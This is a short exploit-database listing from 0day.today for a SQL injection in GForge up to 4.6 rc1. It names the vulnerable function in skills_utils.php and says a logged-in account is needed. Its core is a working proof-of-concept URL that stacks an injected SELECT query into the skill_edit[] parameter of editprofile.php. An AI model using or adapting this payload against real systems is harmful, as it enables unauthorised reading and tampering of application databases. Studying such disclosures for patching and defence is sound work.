[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3861
Category
web applications
Date add
08-10-2008
Platform
unsorted
==========================================================
Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability
==========================================================



Gforge <= 4.6 rc1 skill_edit SQL injection

Vendor Notified: 2008-10-06 
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php

http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit



#  0day.today [2024-11-16]  #